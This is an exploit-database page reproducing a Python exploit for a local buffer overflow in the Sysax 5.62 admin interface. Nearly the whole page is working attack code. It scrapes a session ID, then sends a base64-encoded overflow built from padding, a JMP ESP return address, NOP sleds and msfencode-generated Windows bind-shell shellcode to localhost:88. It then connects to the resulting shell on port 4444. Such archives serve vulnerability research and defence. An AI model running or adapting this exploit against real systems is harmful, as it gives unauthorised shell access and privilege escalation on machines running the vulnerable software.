Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sysax 5.62 - Admin Interface Local Buffer Overflow

🗓️ 20 Jun 2012 00:00:00Reported by Craig FreymanType 
exploitpack
 exploitpack👁 11 Views

Sysax <=5.62 Admin Interface Buffer Overflo

Code
#!/usr/bin/python
##########################################################################################################
#Title: Sysax <= 5.62 Admin Interface Local Buffer Overflow
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit
#Date Discovered: June 15, 2012
#Vendor Contacted: June 19, 2012
#Details: http://www.pwnag3.com/2012/06/sysax-admin-interface-local-priv.html
##########################################################################################################

import socket,sys,time,re,base64,subprocess

def main():
	global login
	print "\n"
	print "****************************************************************************"
	print "        Sysax <= 5.62 Admin Interface Local Buffer Overflow                 "
	print "     	  	         by @cd1zz www.pwnag3.com                              "
	print "****************************************************************************"

	#initial GET
	login = "GET /scgi? HTTP/1.1\r\n"
	login +="Host: localhost:88\r\n"
	login += "Referer: http://localhost:88\r\n\r\n"

	try:
		r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		r.connect((target, port))
		print "[+] Accessing admin interface"
		r.send(login)
	except Exception, e:
		print "[-] There was a problem"
		print e
	
	#loop the recv sock so we get the full page
	page = ''	
	fullpage = ''	
	while "</html>" not in fullpage:
		page = r.recv(4096)
		fullpage += page
	time.sleep(1)

	#regex the sid from the page
	global sid
	sid = re.search(r'sid=[a-zA-Z0-9]{40}',fullpage,re.M)
	if sid is None:
		print "[-] There was a problem finding your SID"
		sys.exit(1)
	time.sleep(1)
	r.close()

def exploit():
	#msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
	shell = (
	"\xdb\xd5\xd9\x74\x24\xf4\xb8\xc3\x8f\xb3\x3e\x5b\x33\xc9"
	"\xb1\x56\x31\x43\x18\x03\x43\x18\x83\xeb\x3f\x6d\x46\xc2"
	"\x57\xfb\xa9\x3b\xa7\x9c\x20\xde\x96\x8e\x57\xaa\x8a\x1e"
	"\x13\xfe\x26\xd4\x71\xeb\xbd\x98\x5d\x1c\x76\x16\xb8\x13"
	"\x87\x96\x04\xff\x4b\xb8\xf8\x02\x9f\x1a\xc0\xcc\xd2\x5b"
	"\x05\x30\x1c\x09\xde\x3e\x8e\xbe\x6b\x02\x12\xbe\xbb\x08"
	"\x2a\xb8\xbe\xcf\xde\x72\xc0\x1f\x4e\x08\x8a\x87\xe5\x56"
	"\x2b\xb9\x2a\x85\x17\xf0\x47\x7e\xe3\x03\x81\x4e\x0c\x32"
	"\xed\x1d\x33\xfa\xe0\x5c\x73\x3d\x1a\x2b\x8f\x3d\xa7\x2c"
	"\x54\x3f\x73\xb8\x49\xe7\xf0\x1a\xaa\x19\xd5\xfd\x39\x15"
	"\x92\x8a\x66\x3a\x25\x5e\x1d\x46\xae\x61\xf2\xce\xf4\x45"
	"\xd6\x8b\xaf\xe4\x4f\x76\x1e\x18\x8f\xde\xff\xbc\xdb\xcd"
	"\x14\xc6\x81\x99\xd9\xf5\x39\x5a\x75\x8d\x4a\x68\xda\x25"
	"\xc5\xc0\x93\xe3\x12\x26\x8e\x54\x8c\xd9\x30\xa5\x84\x1d"
	"\x64\xf5\xbe\xb4\x04\x9e\x3e\x38\xd1\x31\x6f\x96\x89\xf1"
	"\xdf\x56\x79\x9a\x35\x59\xa6\xba\x35\xb3\xd1\xfc\xfb\xe7"
	"\xb2\x6a\xfe\x17\x25\x37\x77\xf1\x2f\xd7\xd1\xa9\xc7\x15"
	"\x06\x62\x70\x65\x6c\xde\x29\xf1\x38\x08\xed\xfe\xb8\x1e"
	"\x5e\x52\x10\xc9\x14\xb8\xa5\xe8\x2b\x95\x8d\x63\x14\x7e"
	"\x47\x1a\xd7\x1e\x58\x37\x8f\x83\xcb\xdc\x4f\xcd\xf7\x4a"
	"\x18\x9a\xc6\x82\xcc\x36\x70\x3d\xf2\xca\xe4\x06\xb6\x10"
	"\xd5\x89\x37\xd4\x61\xae\x27\x20\x69\xea\x13\xfc\x3c\xa4"
	"\xcd\xba\x96\x06\xa7\x14\x44\xc1\x2f\xe0\xa6\xd2\x29\xed"
	"\xe2\xa4\xd5\x5c\x5b\xf1\xea\x51\x0b\xf5\x93\x8f\xab\xfa"
	"\x4e\x14\xdb\xb0\xd2\x3d\x74\x1d\x87\x7f\x19\x9e\x72\x43"
	"\x24\x1d\x76\x3c\xd3\x3d\xf3\x39\x9f\xf9\xe8\x33\xb0\x6f"
	"\x0e\xe7\xb1\xa5")
	
	nops = "\x90" * 20
	#7CA7A787 FFE4 JMP ESP shell32.dll v6.00.2900.6072
	jmp_esp = "\x87\xA7\xA7\x7C"
	payload = base64.b64encode(("A" * 392 + jmp_esp + nops + shell + nops))
	
	#setup exploit
	exploit = "POST /scgi?"+str(sid.group(0))+"&pid=scriptpathbrowse2.htm HTTP/1.1\r\n"
	exploit += "Host: localhost:88\r\n"
	exploit += "Content-Type: application/x-www-form-urlencoded\r\n"
	exploit += "Content-Length: "+ str(len(payload)+3)+"\r\n\r\n"
	exploit += "e2="+payload+"\r\n\r\n"

	try:
		r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		r.connect((target, port))
		print "[+] Sending pwnag3"
		r.send(exploit)
	except Exception, e:
		print "[-] There was a problem"
		print e
	time.sleep(2)
	print "[+] Here is your shell..."
	subprocess.Popen("telnet localhost 4444", shell=True).wait()
	sys.exit(1)

if __name__ == '__main__':
	if len(sys.argv) != 1:
		print "[-] Usage: %s"
		sys.exit(1)
	
	#by default it binds to 127.0.0.1 on 88
	target = "127.0.0.1"
	port = 88
	main()
	exploit()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Jun 2012 00:00Current
0.3Low risk
Vulners AI Score0.3
sysaxadmin interfacebuffer overflowlocalxp sp3 32bitvulnerabilitypwnag3
11